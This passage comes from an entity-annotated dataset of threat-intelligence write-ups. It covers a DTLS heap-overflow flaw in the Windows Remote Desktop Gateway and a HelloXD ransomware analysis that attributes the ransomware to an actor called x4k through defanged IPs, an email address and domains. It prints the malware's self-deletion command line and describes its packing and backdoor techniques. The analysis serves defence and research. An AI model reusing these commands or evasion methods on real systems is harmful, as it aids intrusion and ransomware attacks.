in [MS_TSGU].pdf). The RDG client initiates the DTLS connection by sending a ClientHello to the RDG Server. The RDG server then responds with a DTLS Hello Verify Request that contains a cookie; this is used as a denial of service countermeasure.","entities":[{"id":47089,"label":"SOFTWARE","start_offset":29,"end_offset":75},{"id":47090,"label":"FILEPATH","start_offset":168,"end_offset":181}],"relations":[],"Comments":[]} {"id":1966,"text":" The RDG client responds once again with a Client Hello packet containing the received cookie, which will initiate the DTLS handshake (RFC6347 Section 4.2). Figure 1: Initiation of the DTLS handshake between RDG client and server Figure 2: RDG client and server handshake phase (Source: [MS-TSGU] Section 1.3.3.1.1)","entities":[],"relations":[],"Comments":[]} {"id":1967,"text":"Before starting analysis, we needed to set up a test environment.","entities":[],"relations":[],"Comments":[]} {"id":1968,"text":"For the RDG server we referred to the following walkthrough: http:\/\/terrytlslau.tls1.cc\/2014\/01\/deploying-remote-desktop-gateway-in.html.","entities":[{"id":45199,"label":"URL","start_offset":61,"end_offset":136}],"relations":[],"Comments":[]} {"id":1969,"text":" Now let’s explore these vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":1970,"text":" When a client sends the DTLS ClientHello packet to the server, the server computes a Message Authentication Code (MAC) on it and compares it to the cookie contained in the packet.","entities":[],"relations":[],"Comments":[]} {"id":1971,"text":"But the server only checks the cookie length field, not whether the cookie buffer can be read.","entities":[],"relations":[],"Comments":[]} {"id":1972,"text":"In fact, a 32 byte length is always read, which could lead to a buffer out-of-bounds condition.","entities":[],"relations":[],"Comments":[]} {"id":1973,"text":" It should be noted that a client could send a crafted packet to the server without needing to start an RDP session.","entities":[],"relations":[],"Comments":[]} {"id":1974,"text":"Figure 3, below, shows a packet crafted to display a “Cookie Length” of 32 (32 is equivalent to 0x20 in hexadecimal), which does not match the actual amount of data in the cookie (shown containing only two 0x41 characters).","entities":[],"relations":[],"Comments":[]} {"id":1975,"text":" Figure 3: A crafted packet sending mismatched size and content Related code is found in the DTLSCookieManager::ValidateCookie function: As shown above, although the server checks the “CookieSize” field, the compared length is always *(_DWORD *)(mgr + 16)), whose value is 0x20; however, the real cookie buffer length could be less than 0x20.","entities":[],"relations":[],"Comments":[]} {"id":1976,"text":"A crafted packet could set the “CookieSize” field to 0x20 and have the actual cookie buffer contain less than 0x20 bytes of data. When a DTLS client receives a HelloVerifyRequest packet with a CookieSize larger than 32 bytes the client does not properly validate the CookieSize value against the amount of cookie data in the packet.","entities":[],"relations":[],"Comments":[]} {"id":1977,"text":"This scenario can result in a heap overflow.","entities":[{"id":47091,"label":"attack-pattern","start_offset":30,"end_offset":43}],"relations":[],"Comments":[]} {"id":1978,"text":"It should be noted that if you want modify the “CookieSize“ value, you should modify the other length fields to keep the packet structure valid, as shown below in Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":1979,"text":"Figure 4: An example of a properly modified DTLS packet cookie ","entities":[],"relations":[],"Comments":[]} {"id":1980,"text":"We can see the first packet is a normal ClientHello sent by the client, and the second packet is a crafted packet sent by the server. In order to examine exploitation of this vulnerability, we used WinDBG to attach to the lsass.exe process.","entities":[{"id":47093,"label":"FILEPATH","start_offset":223,"end_offset":232},{"id":47092,"label":"SOFTWARE","start_offset":199,"end_offset":205}],"relations":[],"Comments":[]} {"id":1981,"text":"Below, Figure 5 shows what the call stack looks like when the process crashes.","entities":[],"relations":[],"Comments":[]} {"id":1982,"text":" Figure 5: WinDBG view of call stack when lsass.exe process crashes due to exploitation Vulnerable code is found in the CSsl3TlsClientContext::DigestServerHelloVerifyRequest function: Palo Alto Networks is releasing signature 37094 and 37059 to defend against these vulnerabilities.","entities":[{"id":47094,"label":"SOFTWARE","start_offset":11,"end_offset":17},{"id":47095,"label":"identity","start_offset":186,"end_offset":204}],"relations":[],"Comments":[]} {"id":1983,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1984,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1985,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":1986,"text":"This post is also available in: 日本語 (Japanese) HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021.","entities":[{"id":45202,"label":"malware","start_offset":53,"end_offset":60},{"id":45203,"label":"TIME","start_offset":137,"end_offset":150},{"id":45205,"label":"attack-pattern","start_offset":95,"end_offset":111}],"relations":[{"id":81,"from_id":45202,"to_id":45205,"type":"uses"}],"Comments":[]} {"id":1987,"text":"During our research we observed multiple variants impacting Windows and Linux systems.","entities":[{"id":47096,"label":"SOFTWARE","start_offset":60,"end_offset":67},{"id":47097,"label":"SOFTWARE","start_offset":72,"end_offset":77}],"relations":[],"Comments":[]} {"id":1988,"text":"Unlike other ransomware groups, this ransomware family doesn’t have an active leak site; instead it prefers to direct the impacted victim to negotiations through TOX chat and onion-based messenger instances.","entities":[{"id":47098,"label":"SOFTWARE","start_offset":162,"end_offset":165}],"relations":[],"Comments":[]} {"id":1989,"text":" Unit 42 performed an in-depth analysis of the ransomware samples, the obfuscation and execution from this ransomware family, which contains very similar core functionality to the leaked Babuk\/Babyk source code.","entities":[{"id":45206,"label":"identity","start_offset":1,"end_offset":8},{"id":5874,"label":"threat-actor","start_offset":187,"end_offset":192},{"id":47099,"label":"threat-actor","start_offset":193,"end_offset":198}],"relations":[],"Comments":[]} {"id":1990,"text":"It was also observed that one of the samples deployed MicroBackdoor, an open-source backdoor allowing an attacker to browse the file system, upload and download files, execute commands, and remove itself from the system.","entities":[{"id":5878,"label":"malware","start_offset":54,"end_offset":67}],"relations":[],"Comments":[]} {"id":1991,"text":"We believe this was likely done to monitor the progress of the ransomware and maintain an additional foothold in compromised systems.","entities":[],"relations":[],"Comments":[]} {"id":1992,"text":" During the analysis of the MicroBackdoor sample, Unit 42 observed the configuration and found an embedded IP address, belonging to a threat actor we believe is potentially the developer: x4k, also known as L4ckyguy, unKn0wn, unk0w, _unkn0wn and x4kme.","entities":[{"id":45216,"label":"threat-actor","start_offset":246,"end_offset":251},{"id":45209,"label":"malware","start_offset":28,"end_offset":41},{"id":45212,"label":"threat-actor","start_offset":207,"end_offset":215},{"id":45210,"label":"identity","start_offset":50,"end_offset":57},{"id":45213,"label":"threat-actor","start_offset":217,"end_offset":224},{"id":45211,"label":"threat-actor","start_offset":188,"end_offset":191},{"id":45214,"label":"threat-actor","start_offset":226,"end_offset":231},{"id":45215,"label":"threat-actor","start_offset":233,"end_offset":241}],"relations":[{"id":87,"from_id":45216,"to_id":45211,"type":"duplicate-of"},{"id":83,"from_id":45212,"to_id":45211,"type":"duplicate-of"},{"id":84,"from_id":45213,"to_id":45211,"type":"duplicate-of"},{"id":85,"from_id":45214,"to_id":45211,"type":"duplicate-of"},{"id":86,"from_id":45215,"to_id":45211,"type":"duplicate-of"},{"id":88,"from_id":45209,"to_id":45211,"type":"authored-by"}],"Comments":[]} {"id":1993,"text":" Unit 42 has observed x4k in various hacking and non-hacking forums, which has linked the threat actor to additional malicious activity such as: Palo Alto Networks detects and prevents HelloXD and adjacent x4k activity with the following products and services: Cortex XDR and Next-Generation Firewalls (including cloud-delivered security subscriptions such as WildFire).","entities":[{"id":5898,"label":"SOFTWARE","start_offset":262,"end_offset":272},{"id":5891,"label":"identity","start_offset":1,"end_offset":8},{"id":5895,"label":"malware","start_offset":186,"end_offset":193},{"id":5902,"label":"malware","start_offset":361,"end_offset":369},{"id":47100,"label":"threat-actor","start_offset":22,"end_offset":25},{"id":47101,"label":"identity","start_offset":146,"end_offset":164},{"id":47102,"label":"threat-actor","start_offset":207,"end_offset":210}],"relations":[],"Comments":[]} {"id":1994,"text":"Due to the surge of this malicious activity, we’ve created this threat assessment for overall awareness.","entities":[],"relations":[],"Comments":[]} {"id":1995,"text":"HelloXD Malware Overview Packer Analyses Ransomware Internals WTFBBQ Pivots Hunting for Ransomware Attribution Conclusion Indicators of Compromise","entities":[{"id":45217,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":1996,"text":"Additional Resources","entities":[],"relations":[],"Comments":[]} {"id":1997,"text":" HelloXD is a ransomware family first observed in the wild on Nov. 30, 2021.","entities":[{"id":47103,"label":"malware","start_offset":1,"end_offset":8},{"id":47104,"label":"TIME","start_offset":62,"end_offset":75}],"relations":[],"Comments":[]} {"id":1998,"text":"This ransomware family uses a modified ClamAV logo in their executables.","entities":[{"id":45218,"label":"SOFTWARE","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} {"id":1999,"text":"ClamAV is an open-source antivirus engine used to detect malware.","entities":[{"id":47105,"label":"SOFTWARE","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":2000,"text":"We also have observed additional samples with different versions of the logo, which led us to believe the ransomware developer may like using the ClamAV branding for their ransomware.","entities":[{"id":47106,"label":"SOFTWARE","start_offset":146,"end_offset":152}],"relations":[],"Comments":[]} {"id":2001,"text":"Additionally, some of the observed samples include properties information that can be observed in Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":2002,"text":" The file description included the entry VlahmAV, a play on words on ClamAV, and the developer named the ransomware HelloXD and used another potential alias, uKnow, as the developer of HelloXD in the copyright section.","entities":[{"id":47109,"label":"SOFTWARE","start_offset":69,"end_offset":75},{"id":47111,"label":"malware","start_offset":116,"end_offset":123},{"id":47112,"label":"malware","start_offset":158,"end_offset":163},{"id":47110,"label":"malware","start_offset":185,"end_offset":192}],"relations":[{"id":302,"from_id":47110,"to_id":47112,"type":"duplicate-of"},{"id":301,"from_id":47111,"to_id":47112,"type":"duplicate-of"}],"Comments":[]} {"id":2003,"text":" When executed, HelloXD tries to disable shadow copies to inhibit system recovery before encrypting files using the following commands embedded in the sample: Additionally the ransomware does a ping to 1.1.1[.]1 and asks to wait a timeout of 3000 milliseconds between each reply, quickly followed with a delete command to delete the initial payload.","entities":[{"id":5922,"label":"malware","start_offset":16,"end_offset":23},{"id":5925,"label":"malware","start_offset":195,"end_offset":199},{"id":5926,"label":"IPV4","start_offset":203,"end_offset":212}],"relations":[],"Comments":[]} {"id":2004,"text":" cmd.exe \/C ping 1.1.1[.]1 -n 1 -w 3000 > Nul & Del \/f \/q \"C:\\Users\\admin\\Desktop\\xd.exe\"","entities":[{"id":45219,"label":"FILEPATH","start_offset":59,"end_offset":88},{"id":45220,"label":"FILEPATH","start_offset":1,"end_offset":8},{"id":5931,"label":"tools","start_offset":12,"end_offset":16},{"id":5932,"label":"IPV4","start_offset":17,"end_offset":26}],"relations":[],"Comments":[]} {"id":2005,"text":" Two of the initial set of samples identified create a unique mutex containing the following message:","entities":[],"relations":[],"Comments":[]} {"id":2006,"text":" After those commands are executed, the ransomware finishes by appending the file extension .hello, alongside a ransom note titled Hello.txt (Figure 2).","entities":[{"id":47113,"label":"FILEPATH","start_offset":131,"end_offset":140}],"relations":[],"Comments":[]} {"id":2007,"text":" The ransom note was modified between the observed samples.","entities":[],"relations":[],"Comments":[]} {"id":2008,"text":"In the first sample we encountered (Figure 3, left), the ransom note only linked to a TOX ID, whereas a later observed sample (Figure 3, right) links to an onion domain as well as a TOX ID (different from the one in the first version).","entities":[],"relations":[],"Comments":[]} {"id":2009,"text":"At the time of writing, this site is down.","entities":[],"relations":[],"Comments":[]} {"id":2010,"text":" The ransomware creates an ID for the victim which has to be sent to the threat actor to make it possible to identify the victim and provide a decryptor.","entities":[],"relations":[],"Comments":[]} {"id":2011,"text":"The ransom note also instructs victims to download Tox and provides a Tox Chat ID to reach the threat actor.","entities":[],"relations":[],"Comments":[]} {"id":2012,"text":"Tox is a peer-to-peer instant messaging protocol that offers end-to-end encryption and has been observed being used by other ransomware groups for negotiations.","entities":[],"relations":[],"Comments":[]} {"id":2013,"text":"For example, LockBit 2.0 leverages Tox Chat for threat actor communications.","entities":[{"id":45221,"label":"malware","start_offset":13,"end_offset":24},{"id":45222,"label":"tools","start_offset":35,"end_offset":43}],"relations":[{"id":89,"from_id":45221,"to_id":45222,"type":"uses"}],"Comments":[]} {"id":2014,"text":" When observing both variants executing on virtual environments, we noted that the more recent variants changed the background to a ghost – a theme we’ve noticed in this threat actor’s work since our earliest observations of it.","entities":[{"id":5960,"label":"malware","start_offset":132,"end_offset":137}],"relations":[],"Comments":[]} {"id":2015,"text":"However, the previous version didn’t change the background at all – it simply left the ransom note we observed previously (Figure 4). During analysis and threat intel gathering, we discovered two main packers used for HelloXD ransomware binaries, as well as for other malware samples linked to the potential author (Figure 5).","entities":[{"id":47114,"label":"malware","start_offset":219,"end_offset":226}],"relations":[],"Comments":[]} {"id":2016,"text":"The first type of packer is a modified version of UPX.","entities":[{"id":45223,"label":"tools","start_offset":50,"end_offset":53}],"relations":[],"Comments":[]} {"id":2017,"text":"The code is extremely similar between UPX-packed binaries and the custom packer, however the custom packer avoids using identifiable section names such as .UPX0 and .UPX1, and leaves the default .text, .data, and .rsrc names unchanged.","entities":[{"id":47115,"label":"tools","start_offset":38,"end_offset":42}],"relations":[],"Comments":[]} {"id":2018,"text":"There are also no magic bytes within the packed payload, unlike UPX-packed binaries, which contain the magic bytes UPX!.","entities":[{"id":47116,"label":"tools","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} {"id":2019,"text":" However, a dead giveaway that the sample is packed is the raw size of the .text section, which is zeroed out, while the virtual size is much larger, as expected; this is identical to a .UPX0 section.","entities":[],"relations":[],"Comments":[]} {"id":2020,"text":"As there is no data within the .text section on disk, the entry point of the unpacking stub is within the .data section, which will unpack the malicious code into the .text section on runtime.","entities":[],"relations":[],"Comments":[]} {"id":2021,"text":" All of these details point toward the threat actor having modified or copied certain elements from the UPX packer, which can be further confirmed by comparing a UPX-packed binary with a custom-packed HelloXD binary.","entities":[{"id":47117,"label":"malware","start_offset":201,"end_offset":208},{"id":47118,"label":"tools","start_offset":104,"end_offset":114}],"relations":[],"Comments":[]} {"id":2022,"text":" The second packer we discovered consists of two layers, with the second being the custom UPX packer discussed above.","entities":[{"id":47119,"label":"tools","start_offset":90,"end_offset":100}],"relations":[],"Comments":[]} {"id":2023,"text":"This particular packer seems to be more common on x64 binaries and involves decrypting embedded blobs using a seemingly custom algorithm containing unconventional instructions such as XLAT (Figure 6). Aside from storing the encrypted second layer, there is little to no obfuscation within the packer; API calls such as VirtualAlloc and VirtualProtect are clearly visible, and there is no control flow obfuscation.","entities":[],"relations":[],"Comments":[]} {"id":2024,"text":" We have observed two different samples of the HelloXD ransomware publicly available, indicating it is still under development by the author(s).","entities":[{"id":6000,"label":"malware","start_offset":47,"end_offset":54}],"relations":[],"Comments":[]} {"id":2025,"text":"The first sample is fairly rudimentary, with minimal obfuscation and typically paired with an obfuscated loader responsible for decrypting it through the use of the WinCrypt API before injecting it into memory.","entities":[{"id":45225,"label":"SOFTWARE","start_offset":165,"end_offset":173}],"relations":[],"Comments":[]} {"id":2026,"text":"The second sample, on the other hand, is far more obfuscated, and is executed in memory by a packer rather than a full-scale loader.","entities":[],"relations":[],"Comments":[]} {"id":2027,"text":"While the obfuscation and execution may differ between the two, both samples contain very similar core functionality, due to the author copying the leaked Babuk\/Babyk source code in order to develop the HelloXD ransomware (Figure 7).","entities":[{"id":47122,"label":"malware","start_offset":203,"end_offset":210},{"id":47121,"label":"malware","start_offset":161,"end_offset":166},{"id":47120,"label":"malware","start_offset":155,"end_offset":160}],"relations":[{"id":303,"from_id":47121,"to_id":47122,"type":"variant-of"},{"id":304,"from_id":47120,"to_id":47122,"type":"variant-of"}],"Comments":[]} {"id":2028,"text":"As a result, a lot of the function structure overlaps with Babuk, after getting past the obfuscation.","entities":[{"id":47123,"label":"malware","start_offset":59,"end_offset":64}],"relations":[],"Comments":[]} {"id":2029,"text":" Table 1. Ransomware sample comparison summary.","entities":[],"relations":[],"Comments":[]} {"id":2030,"text":" While there is a lot of overlap between HelloXD and Babuk, there are some small but crucial differences to take note of between Babuk and the two different variants. HelloXD version 1 is the least modified, utilizing Curve25519-Donna and a modified HC-128 algorithm to encrypt file data, while also containing the same CRC hashing routine incorporating the string dong, possibly referencing Chuong Dong, who had previously analyzed and reported on the first version of Babuk (Figure 8).","entities":[{"id":47125,"label":"malware","start_offset":53,"end_offset":58},{"id":47127,"label":"malware","start_offset":168,"end_offset":175},{"id":47128,"label":"malware","start_offset":471,"end_offset":476},{"id":47129,"label":"identity","start_offset":393,"end_offset":404},{"id":47124,"label":"malware","start_offset":41,"end_offset":48},{"id":47126,"label":"malware","start_offset":129,"end_offset":134}],"relations":[{"id":305,"from_id":47124,"to_id":47125,"type":"variant-of"}],"Comments":[]} {"id":2031,"text":" The HelloXD author(s) did modify the infamous file marker and mutex however, opting for dxunmgqehhehyrhtxywuhwrvzxqrcblo as the file marker and With best wishes And good intentions… as the mutex (Figure 9).","entities":[{"id":47130,"label":"malware","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} {"id":2032,"text":" With HelloXD version 2, the author(s) opted to alter the encryption routine, swapping out the modified HC-128 algorithm with the Rabbit symmetric cipher.","entities":[{"id":6049,"label":"malware","start_offset":6,"end_offset":13}],"relations":[],"Comments":[]} {"id":2033,"text":"Additionally, the file marker changed again, this time to what seems to be random bytes rather than a coherent string.","entities":[],"relations":[],"Comments":[]} {"id":2034,"text":"The mutex is also modified, set to nqldslhumipyuzjnatqucmuycqkxjon in one of the samples (Figure 10).","entities":[],"relations":[],"Comments":[]} {"id":2035,"text":" Both versions have been compiled with the same compiler (believed to be GCC 3.x and above based on the mangling of export names), resulting in very similar exports between not only the ransomware variants, but also other malware that we have linked to the potential author (Figure 11). The biggest difference between the versions is the interesting addition of a secondary payload embedded within version 2.","entities":[{"id":47131,"label":"SOFTWARE","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} {"id":2036,"text":"This payload is encrypted using the WinCrypt API, in the same fashion as the obfuscated loader discussed above.","entities":[],"relations":[],"Comments":[]} {"id":2037,"text":"Once decrypted, the payload is dropped to System32 with the name userlogin.exe before a service is created that points to it.","entities":[{"id":45228,"label":"FILEPATH","start_offset":65,"end_offset":78}],"relations":[],"Comments":[]} {"id":2038,"text":"userlogin.exe is then executed (Figure 12). ","entities":[],"relations":[],"Comments":[]} {"id":2039,"text":"What is peculiar about this file is it is a variant of the open-source MicroBackdoor, a backdoor allowing an attacker to browse the file system, upload and download files, execute commands and remove itself from the system (Figure 13).","entities":[{"id":47132,"label":"malware","start_offset":71,"end_offset":84}],"relations":[],"Comments":[]} {"id":2040,"text":"As the threat actor would normally have a foothold into the network prior to ransomware deployment, it raises the question of why this backdoor is part of the ransomware execution.","entities":[],"relations":[],"Comments":[]} {"id":2041,"text":"One possibility is that it is used to monitor ransomed systems for blue team and incident response (IR) activity, though even in that case it is unusual to see offensive tools dropped at this point in the infection.","entities":[],"relations":[],"Comments":[]} {"id":2042,"text":"While analyzing the ransomware binaries, we discovered a unique string prevalent in almost all of the samples: :wtfbbq (stored as UTF-16LE).","entities":[],"relations":[],"Comments":[]} {"id":2043,"text":"Querying VirusTotal with this string led to the discovery of eight files, six of which could be directly attributed to x4k through their own VirusTotal graph mapping out their infrastructure.","entities":[{"id":45229,"label":"SOFTWARE","start_offset":9,"end_offset":19},{"id":45230,"label":"threat-actor","start_offset":119,"end_offset":122},{"id":45231,"label":"SOFTWARE","start_offset":141,"end_offset":151}],"relations":[],"Comments":[]} {"id":2044,"text":"The discovered samples are primarily Cobalt Strike Beacons, utilizing heavy control flow obfuscation – unlike the HelloXD ransomware samples we had previously seen.","entities":[{"id":47133,"label":"tools","start_offset":37,"end_offset":58},{"id":47134,"label":"malware","start_offset":114,"end_offset":121}],"relations":[],"Comments":[]} {"id":2045,"text":" Unfortunately, this specific string is not completely unique to x4k, and is instead found on several GitHub repositories as part of a technique to allow a running executable to delete itself from disk through renaming primary data streams within the file to :wtfbbq.","entities":[{"id":47135,"label":"threat-actor","start_offset":65,"end_offset":68},{"id":47136,"label":"SOFTWARE","start_offset":102,"end_offset":108}],"relations":[],"Comments":[]} {"id":2046,"text":"Running a search for the non-UTF-16LE string results in multiple files, and filtering for executables yields 10 results, the majority of which are NIM-based binaries – potentially linked to this GitHub repository.","entities":[{"id":45232,"label":"SOFTWARE","start_offset":195,"end_offset":212}],"relations":[],"Comments":[]} {"id":2047,"text":" While the :wtfbbq string is not unique to x4k, by searching for the UTF-16LE version found inside the analyzed HelloXD ransomware samples, we only came across binaries linked to x4k’s infrastructure, providing a fairly strong link between HelloXD and x4k.","entities":[{"id":6089,"label":"malware","start_offset":112,"end_offset":119},{"id":6093,"label":"malware","start_offset":240,"end_offset":247},{"id":47137,"label":"threat-actor","start_offset":43,"end_offset":46},{"id":47139,"label":"threat-actor","start_offset":252,"end_offset":255},{"id":47138,"label":"threat-actor","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} {"id":2048,"text":" The backdoor provided extremely useful insight into the potential threat actor behind the ransomware, as it had the following hardcoded IP address to use as the command and control (C2): 193[.]242[.]145[.]158.","entities":[{"id":6096,"label":"IPV4","start_offset":188,"end_offset":209}],"relations":[],"Comments":[]} {"id":2049,"text":"Upon navigating to this IP address, we observed an email address – tebya@poime[.]li – on the page title, the first link in the chain of attribution (Figure 14). Using the email address as a pivot, we identified additional domains that were linked to tebya@poime[.]li.","entities":[{"id":45233,"label":"EMAIL","start_offset":67,"end_offset":83},{"id":45234,"label":"EMAIL","start_offset":251,"end_offset":267}],"relations":[],"Comments":[]} {"id":2050,"text":"Table 2.","entities":[],"relations":[],"Comments":[]} {"id":2051,"text":"Domains linked to tebya@poime.li Some of them historically resolved to some malicious IPs, which led us to discover additional infrastructure and malware being hosted in other domains (Table 3).","entities":[{"id":47140,"label":"EMAIL","start_offset":18,"end_offset":32}],"relations":[],"Comments":[]} {"id":2052,"text":"Many of these also use the x4k name in the domain.","entities":[{"id":45235,"label":"threat-actor","start_offset":27,"end_offset":30}],"relations":[],"Comments":[]} {"id":2053,"text":" Table 3. PDNS of 164[.]68[.]114[.]29 and 167[.]86[.]87[.]27 When looking at this infrastructure on VirusTotal, we observed that some of the domains we found were part of a VirusTotal graph called a.y.e\/ created by the user x4k on June 30, 2021.","entities":[{"id":6107,"label":"IPV4","start_offset":18,"end_offset":37},{"id":6109,"label":"IPV4","start_offset":42,"end_offset":60},{"id":47141,"label":"SOFTWARE","start_offset":101,"end_offset":111},{"id":47142,"label":"TIME","start_offset":232,"end_offset":245},{"id":47143,"label":"threat-actor","start_offset":225,"end_offset":228},{"id":47144,"label":"SOFTWARE","start_offset":174,"end_offset":184}],"relations":[],"Comments":[]} {"id":2054,"text":"On this graph, we found his infrastructure mapped out and malicious files that were also linked to the domains.","entities":[],"relations":[],"Comments":[]} {"id":2055,"text":"This, however, was not the only graph we observed x4k creating.","entities":[{"id":45236,"label":"threat-actor","start_offset":50,"end_offset":53}],"relations":[],"Comments":[]} {"id":2056,"text":"We also encountered additional graphs, mapping different things such as “Russian Hosts,” “DDoS Guard” and others, dating back to August 10, 2020 (Figure 15).","entities":[{"id":47146,"label":"TIME","start_offset":129,"end_offset":144}],"relations":[],"Comments":[]} {"id":2057,"text":" Additionally, we observed the initial email being linked to a GitHub account (Figure 16), as well as various forums including XSS, a known Russian-speaking hacking forum created to share knowledge about exploits, vulnerabilities, malware and network penetration.","entities":[{"id":47147,"label":"attack-pattern","start_offset":127,"end_offset":130},{"id":47148,"label":"SOFTWARE","start_offset":63,"end_offset":69}],"relations":[],"Comments":[]} {"id":2058,"text":"From the GitHub page, we also observed a URL to a site – xn--90a5ai[.]com(фсб[.]com) – resolving to the previously mentioned IP 164[.]68[.]114[.]29, which at this point in time only shows an animation of interconnecting points.","entities":[{"id":45239,"label":"DOMAIN","start_offset":74,"end_offset":83},{"id":45240,"label":"IPV4","start_offset":128,"end_offset":147},{"id":45237,"label":"SOFTWARE","start_offset":9,"end_offset":15},{"id":45238,"label":"DOMAIN","start_offset":57,"end_offset":73}],"relations":[{"id":306,"from_id":45238,"to_id":45240,"type":"related-to"},{"id":307,"from_id":45239,"to_id":45240,"type":"related-to"}],"Comments":[]} {"id":2059,"text":"That being said, when looking at the HTML source code of the site, we discovered a couple of references to the user observed before – x4kme – and other aliases such as uKn0wn, which was observed in the HelloXD ransomware samples.","entities":[{"id":47152,"label":"identity","start_offset":168,"end_offset":174},{"id":47150,"label":"identity","start_offset":134,"end_offset":139},{"id":47151,"label":"malware","start_offset":202,"end_offset":209}],"relations":[{"id":308,"from_id":47150,"to_id":47152,"type":"duplicate-of"}],"Comments":[]} {"id":2060,"text":"Figure 17. Snippet of Script in HTML Source Code xn--90a5ai[.]comFrom the list of aliases used by the threat actor","entities":[{"id":47153,"label":"DOMAIN","start_offset":49,"end_offset":65}],"relations":[],"Comments":[]} {"id":2061,"text":", we were able to observe another GitHub account with the name l4ckyguy, sharing the profile picture, location and URL in the description, with a link to the previously observed account (x4kme), and a name, Ivan Topor, which we believe may be another alias for this threat actor.","entities":[{"id":45241,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":45242,"label":"identity","start_offset":63,"end_offset":71},{"id":45243,"label":"threat-actor","start_offset":187,"end_offset":192},{"id":45244,"label":"identity","start_offset":207,"end_offset":218},{"id":6137,"label":"location","start_offset":111,"end_offset":114},{"id":6138,"label":"location","start_offset":195,"end_offset":198},{"id":6140,"label":"location","start_offset":236,"end_offset":239}],"relations":[{"id":93,"from_id":45243,"to_id":45244,"type":"related-to"},{"id":92,"from_id":45243,"to_id":45242,"type":"related-to"}],"Comments":[]} {"id":2062,"text":"A further account, l4cky-control, was also discovered.","entities":[{"id":47154,"label":"identity","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} {"id":2063,"text":"This repository contained a Python script that would decrypt a secondary Python script which reached out to the IP 167[.]86[.]87[.]27 to download and execute another Python script.","entities":[{"id":6141,"label":"IPV4","start_offset":115,"end_offset":133}],"relations":[],"Comments":[]} {"id":2064,"text":"This particular IP was linked to a Contabo server that x4k had also included within their VirusTotal graph discussed above.","entities":[{"id":45245,"label":"threat-actor","start_offset":55,"end_offset":58},{"id":45247,"label":"identity","start_offset":35,"end_offset":42},{"id":45246,"label":"SOFTWARE","start_offset":90,"end_offset":101}],"relations":[{"id":94,"from_id":45245,"to_id":45247,"type":"uses"}],"Comments":[]} {"id":2065,"text":" We also found a YouTube account linked to the actor through the initial email tebya@poime[.]li, using another alias, Vanya Topor.","entities":[{"id":47156,"label":"identity","start_offset":118,"end_offset":129},{"id":47155,"label":"EMAIL","start_offset":79,"end_offset":95}],"relations":[],"Comments":[]} {"id":2066,"text":"It’s worth pointing out that “Vanya” is a diminutive for Ivan.","entities":[{"id":47157,"label":"identity","start_offset":30,"end_offset":35}],"relations":[],"Comments":[]} {"id":2067,"text":" The YouTube account has no public videos, but we observed this threat actor sharing unlisted links in various hacking forums.","entities":[{"id":45248,"label":"SOFTWARE","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} {"id":2068,"text":"The content of the videos were tutorials and walkthroughs, where the threat actor showed his methodology of performing certain actions, depending on the video.","entities":[],"relations":[],"Comments":[]} {"id":2069,"text":"The videos had no sound, but the threat actor would type commentary on a terminal to address something the viewer was observing on screen.","entities":[],"relations":[],"Comments":[]} {"id":2070,"text":" The videos found gave us insight into x4k operations before moving into ransomware activity specifically.","entities":[{"id":45249,"label":"threat-actor","start_offset":39,"end_offset":43}],"relations":[],"Comments":[]} {"id":2071,"text":"We learned how this threat actor leverages Cobalt Strike for his operations, including how to set up Beacons as well as how to send files to compromised systems.","entities":[{"id":47158,"label":"tools","start_offset":43,"end_offset":56}],"relations":[],"Comments":[]} {"id":2072,"text":"In one of the videos, we actually observed the threat actor performing a DNS leak test on his Android phone.","entities":[],"relations":[],"Comments":[]} {"id":2073,"text":"We also got to observe how the domain фсб[.]com used to look in October 2020 – a blog of sorts titled “Ghost in the Wire.”","entities":[{"id":45250,"label":"DOMAIN","start_offset":38,"end_offset":47},{"id":45251,"label":"TIME","start_offset":64,"end_offset":76}],"relations":[],"Comments":[]} {"id":2074,"text":"Where the threat actor keeps alluding to his “Ghost” theme, a similar theme was observed in the HelloXD ransomware samples (Figure 19). ","entities":[{"id":6160,"label":"malware","start_offset":46,"end_offset":51},{"id":6161,"label":"malware","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} {"id":2075,"text":"In another video instance, we observed the threat actor submit a LockBit 2.0 sample on Cuckoo sandbox and compare the results with another presumably LockBit 2.0 sample prior to the one submitted in the video.","entities":[{"id":47159,"label":"malware","start_offset":65,"end_offset":76},{"id":47161,"label":"tools","start_offset":87,"end_offset":101},{"id":47160,"label":"malware","start_offset":150,"end_offset":161}],"relations":[],"Comments":[]} {"id":2076,"text":"At the time of writing, we don’t believe x4k is related to LockBit 2.0 activity, but we did find the choice of this particular ransomware family interesting (Figure 20).","entities":[{"id":45253,"label":"malware","start_offset":59,"end_offset":70},{"id":45252,"label":"threat-actor","start_offset":41,"end_offset":44}],"relations":[],"Comments":[]} {"id":2077,"text":"We also noticed this threat actor leveraging the use of other sandboxes besides Cuckoo – such as ANY.RUN and Hybrid Analysis – to test out verdicts and tooling, alongside the use of various virtual machines.","entities":[{"id":47164,"label":"tools","start_offset":80,"end_offset":86},{"id":47162,"label":"SOFTWARE","start_offset":97,"end_offset":104},{"id":47163,"label":"SOFTWARE","start_offset":109,"end_offset":124}],"relations":[],"Comments":[]} {"id":2078,"text":" Additionally, this threat actor not only leverages open-source tooling, but also develops his own tools and scripts.","entities":[],"relations":[],"Comments":[]} {"id":2079,"text":"We were able to see this threat actor demonstrating some of his tools performing automated actions in his videos, such as obfuscating files, creating executables and code signing (Figure 21).","entities":[],"relations":[],"Comments":[]} {"id":2080,"text":" Taking a closer look at x4k’s main OS, we believe it to be a customized Kali Linux instance, tailored to his 